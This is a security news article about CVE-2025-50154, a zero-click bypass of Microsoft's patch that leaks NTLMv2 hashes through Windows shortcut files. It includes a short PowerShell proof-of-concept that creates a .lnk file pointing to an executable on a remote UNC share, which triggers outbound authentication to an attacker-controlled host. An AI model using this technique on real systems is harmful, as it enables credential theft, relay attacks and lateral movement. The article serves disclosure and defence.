Cybersecurity researchers at Cymulate have discovered a critical vulnerability that bypasses Microsoft’s recent security patch, allowing attackers to extract NTLM credential hashes without any user interaction.
The new vulnerability, assigned CVE-2025-50154, demonstrates that Microsoft’s fix for the original CVE-2025-24054 was incomplete, leaving systems vulnerable to zero-click attacks even after applying security updates.
Technical Exploitation Method Revealed
The vulnerability exploits a gap in Microsoft’s patch implementation by manipulating Windows shortcut files (.lnk) to trigger automatic NTLM authentication.
While the original vulnerability used UNC paths for icon locations, researchers found that pointing the TargetPath to a remote executable file while using a local icon bypasses the security fix.
The attack utilizes PowerShell to create malicious shortcuts:
powershell$shortcutPath = "C:\Users\Cymuser\Desktop\LAB\lab.lnk"
$targetPath = "\\192.168.159.129\share\execute.exe"
$iconLocation = "C:\Windows\System32\SHELL32.dll"
$wShell = New-Object -ComObject WScript.Shell
$shortcut = $wShell.CreateShortcut($shortcutPath)
$shortcut.TargetPath = $targetPath
$shortcut.IconLocation = $iconLocation
$shortcut.Save()
When Windows Explorer attempts to render the shortcut icon, it automatically retrieves the remote executable file to extract icon data from the .rsrc section, specifically the RT_ICON and RT_GROUP_ICON headers.
This process triggers NTLM authentication, exposing the user’s NTLMv2-SSP hash to attackers monitoring network traffic.
Critical Impact on Enterprise Security
The vulnerability poses significant risks to enterprise environments, as captured NTLM hashes can be exploited through offline brute-force attacks or NTLM relay attacks.
These techniques enable attackers to achieve privilege escalation and lateral movement across networks, particularly when targeting high-privilege accounts.
Beyond credential theft, the vulnerability allows attackers to silently download malicious binaries to target systems without user consent or immediate execution.
While these files aren’t automatically executed, they create a foothold for subsequent attacks, including malware deployment, ransomware, or additional credential harvesting.
Ruben Enkaoua, the researcher who discovered the bypass, noted that the attack requires zero user interaction, significantly expanding the attack surface for organizations relying solely on Microsoft’s April security patch.
The vulnerability affects fully patched Windows systems, demonstrating how incomplete security fixes can leave critical gaps in protection.
Microsoft has acknowledged the vulnerability through its Security Response Center (MSRC) and assigned it the official CVE identifier.
A comprehensive security update addressing the bypass is expected to be released soon.
Organizations should prepare for immediate patching once the update becomes available and consider implementing additional network-level NTLM protections as interim mitigation measures.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates
%20(1).webp?resize=1600,900&ssl=1&description=The new vulnerability, assigned CVE-2025-50154, demonstrates that Microsoft's fix for the original CVE-2025-24054 was incomplete){kind=link}